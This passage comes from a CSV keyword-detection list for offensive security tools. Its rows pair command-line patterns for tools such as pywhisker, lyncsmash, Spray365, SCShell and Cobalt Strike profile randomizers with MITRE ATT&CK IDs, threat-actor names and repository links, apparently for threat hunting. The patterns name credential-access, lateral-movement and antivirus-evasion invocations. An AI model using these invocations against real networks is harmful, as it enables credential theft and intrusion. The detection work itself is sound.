simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -"*.py -d ""test.local"" -u ""john"" -p ""password123"" --target ""user2"" --action ""list"" --dc-ip ""10.10.10.1""*",offensive_tool_keyword,pywhisker,Python version of the C# tool for Shadow Credentials attacks,T1552.001 - T1136 - T1098,TA0003 - TA0004 - TA0005,N/A,N/A,Credential Access,https://github.com/ShutdownRepo/pywhisker,1,0,N/A,10,5,418,49,2023-10-03T14:10:17Z,2021-07-21T19:20:00Z -*.py -d * -u * -p * --target * --action * --export PEM*,offensive_tool_keyword,pywhisker,Python version of the C# tool for Shadow Credentials attacks,T1552.001 - T1136 - T1098,TA0003 - TA0004 - TA0005,N/A,N/A,Credential Access,https://github.com/ShutdownRepo/pywhisker,1,0,N/A,10,5,418,49,2023-10-03T14:10:17Z,2021-07-21T19:20:00Z -"*.py -d * -u * -p * --target * --action ""add"" --filename * ",offensive_tool_keyword,pywhisker,Python version of the C# tool for Shadow Credentials attacks,T1552.001 - T1136 - T1098,TA0003 - TA0004 - TA0005,N/A,N/A,Credential Access,https://github.com/ShutdownRepo/pywhisker,1,0,N/A,10,5,418,49,2023-10-03T14:10:17Z,2021-07-21T19:20:00Z -"*.py -d * -u * -p * --target * --action ""clear""* ",offensive_tool_keyword,pywhisker,Python version of the C# tool for Shadow Credentials attacks,T1552.001 - T1136 - T1098,TA0003 - TA0004 - TA0005,N/A,N/A,Credential Access,https://github.com/ShutdownRepo/pywhisker,1,0,N/A,10,5,418,49,2023-10-03T14:10:17Z,2021-07-21T19:20:00Z -"*.py -d * -u * -p * --target * --action ""info"" --device-id *",offensive_tool_keyword,pywhisker,Python version of the C# tool for Shadow Credentials attacks,T1552.001 - T1136 - T1098,TA0003 - TA0004 - TA0005,N/A,N/A,Credential Access,https://github.com/ShutdownRepo/pywhisker,1,0,N/A,10,5,418,49,2023-10-03T14:10:17Z,2021-07-21T19:20:00Z -"*.py -d * -u * -p * --target * --action ""list"" *",offensive_tool_keyword,pywhisker,Python version of the C# tool for Shadow Credentials attacks,T1552.001 - T1136 - T1098,TA0003 - TA0004 - TA0005,N/A,N/A,Credential Access,https://github.com/ShutdownRepo/pywhisker,1,0,N/A,10,5,418,49,2023-10-03T14:10:17Z,2021-07-21T19:20:00Z -"*.py -d * -u * -p * --target * --action ""remove"" --device-id *",offensive_tool_keyword,pywhisker,Python version of the C# tool for Shadow Credentials attacks,T1552.001 - T1136 - T1098,TA0003 - TA0004 - TA0005,N/A,N/A,Credential Access,https://github.com/ShutdownRepo/pywhisker,1,0,N/A,10,5,418,49,2023-10-03T14:10:17Z,2021-07-21T19:20:00Z -*.py discover -H domain_list.txt*,offensive_tool_keyword,lyncsmash,a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ,T1190 - T1087 - T1110,TA0006 - TA0007,N/A,N/A,Credential Access,https://github.com/nyxgeek/lyncsmash,1,0,N/A,N/A,4,323,68,2023-05-03T19:07:11Z,2016-05-20T04:32:41Z -*.py enum -H * -U *.txt -P *.txt -*.txt*,offensive_tool_keyword,lyncsmash,a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ,T1190 - T1087 - T1110,TA0006 - TA0007,N/A,N/A,Credential Access,https://github.com/nyxgeek/lyncsmash,1,0,N/A,N/A,4,323,68,2023-05-03T19:07:11Z,2016-05-20T04:32:41Z -*.py -f *.exe -e -m 4,offensive_tool_keyword,frampton,PE Binary Shellcode Injector - Automated code cave discovery. shellcode injection - ASLR bypass - x86/x64 compatible,T1055 - T1548.002 - T1129 - T1001,TA0002 - TA0003- TA0004 -TA0011,N/A,N/A,POST Exploitation tools,https://github.com/ins1gn1a/Frampton,1,1,N/A,N/A,1,69,16,2019-11-24T22:34:48Z,2019-10-29T00:22:14Z -*.py --file *.ps1 --server amsi*,offensive_tool_keyword,avred,Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.,T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/dobin/avred,1,0,N/A,9,2,172,19,2023-09-30T12:28:42Z,2022-05-19T12:12:34Z -*.py -k * -f *.doc -o *.html*,offensive_tool_keyword,EmbedInHTML,What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.,T1027 - T1566.001,TA0005 - TA0002,N/A,N/A,Phishing,https://github.com/Arno0x/EmbedInHTML,1,0,N/A,10,5,458,144,2017-09-27T13:16:06Z,2017-09-11T07:17:20Z -*.py lock -H * -u administrator -d *,offensive_tool_keyword,lyncsmash,a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ,T1190 - T1087 - T1110,TA0006 - TA0007,N/A,N/A,Credential Access,https://github.com/nyxgeek/lyncsmash,1,0,N/A,N/A,4,323,68,2023-05-03T19:07:11Z,2016-05-20T04:32:41Z -*.py -method BOTH -dc-ip *,offensive_tool_keyword,LdapRelayScan,Check for LDAP protections regarding the relay of NTLM authentication,T1595 T1590 T1591,N/A,N/A,N/A,Reconnaissance,https://github.com/zyn3rgy/LdapRelayScan,1,0,N/A,8,4,389,51,2023-09-04T05:43:00Z,2022-01-16T06:50:44Z -*.py -method LDAPS -dc-ip *,offensive_tool_keyword,LdapRelayScan,Check for LDAP protections regarding the relay of NTLM authentication,T1595 T1590 T1591,N/A,N/A,N/A,Reconnaissance,https://github.com/zyn3rgy/LdapRelayScan,1,0,N/A,8,4,389,51,2023-09-04T05:43:00Z,2022-01-16T06:50:44Z -*.py --server amsi --file *.exe*,offensive_tool_keyword,avred,Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.,T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/dobin/avred,1,0,N/A,9,2,172,19,2023-09-30T12:28:42Z,2022-05-19T12:12:34Z -*.py spray -ep *,offensive_tool_keyword,Spray365,Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).,T1110.003,TA0006,N/A,N/A,Credential Access,https://github.com/MarkoH17/Spray365,1,0,N/A,N/A,3,296,53,2022-07-14T14:45:57Z,2021-11-04T18:20:39Z -*.py --zip -c All -d * -u * --hashes 'ffffffffffffffffffffffffffffffff':* -dc *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*.py* --payload *.ps1*,offensive_tool_keyword,cobaltstrike,A simple python packer to easily bypass Windows Defender,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Unknow101/FuckThatPacker,1,0,N/A,10,10,612,91,2022-04-03T18:20:01Z,2020-08-13T07:26:07Z -*.py* service -action create -service-name *,offensive_tool_keyword,wmiexec-pro,The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement,T1021.006 - T1560.001,TA0008 - TA0040,N/A,N/A,Network Exploitation tools,https://github.com/XiaoliChan/wmiexec-Pro,1,0,N/A,N/A,8,790,98,2023-07-31T03:58:14Z,2023-04-04T06:24:07Z -*.py* -service-name * -hashes *,offensive_tool_keyword,cobaltstrike,Fileless lateral movement tool that relies on ChangeServiceConfigA to run command,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Mr-Un1k0d3r/SCShell,1,0,N/A,10,10,1241,228,2023-07-10T01:31:54Z,2019-11-13T23:39:27Z -*.py*found-users.txt*,offensive_tool_keyword,icebreaker,Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment,T1110.001 - T1110.003 - T1059.003,TA0006 - TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/DanMcInerney/icebreaker,1,0,N/A,10,10,1175,168,2018-10-24T18:14:53Z,2017-12-04T03:42:28Z -*.rclone.exe config*,greyware_tool_keyword,rclone,rclone abused by threat actors for data exfiltration,T1567.002 - T1020 - T1039,TA0010 ,N/A,N/A,Data Exfiltration,https://github.com/rclone/rclone,1,0,N/A,6,10,40569,3714,2023-10-03T18:57:28Z,2014-03-16T16:19:57Z -*.resources.123456.*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*.rtf.bat*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.rtf.dll*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.rtf.exe*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.rtf.htm*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.rtf.jar*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.rtf.js*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.rtf.sfx*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.rtf.vbs*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.sccmhunter*,offensive_tool_keyword,sccmhunter,SCCMHunter is a post-ex tool built to streamline identifying profiling and attacking SCCM related assets in an Active Directory domain,T1087 - T1046 - T1484,TA0003 - TA0006 - TA0011,N/A,N/A,Exploitation tools,https://github.com/garrettfoster13/sccmhunter,1,0,N/A,9,4,344,38,2023-08-25T06:17:23Z,2023-02-20T14:09:42Z -*.search.123456.*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*.secure.123456.*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*.sh *--checksec*,offensive_tool_keyword,linux-exploit-suggester,Linux privilege escalation auditing tool,T1078 - T1068 - T1055,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/The-Z-Labs/linux-exploit-suggester,1,0,N/A,10,10,4725,1055,2023-08-18T17:29:23Z,2016-10-06T21:55:51Z -*.sh *cvelist-file:*,offensive_tool_keyword,linux-exploit-suggester,Linux privilege escalation auditing tool,T1078 - T1068 - T1055,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/The-Z-Labs/linux-exploit-suggester,1,0,N/A,10,10,4725,1055,2023-08-18T17:29:23Z,2016-10-06T21:55:51Z -*.sharpgen *,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,0,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z -*.ShellcodeRDI*,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,1,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -*.sites.123456.*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*.SliverRPC/*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,1,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*.smtp.123456.*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*.ssl.123456.*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*.stage.123456.*,offensive_tool_keyword,cobaltstrike,Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/mgeeky/RedWarden,1,1,N/A,10,10,820,138,2022-10-07T14:05:25Z,2021-05-15T22:05:39Z -*.stage.123456.*,offensive_tool_keyword,cobaltstrike,dns beacons - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,dns query field,10,10,N/A,N/A,N/A,N/A -*.static.123456.*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*.status.123456.*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth 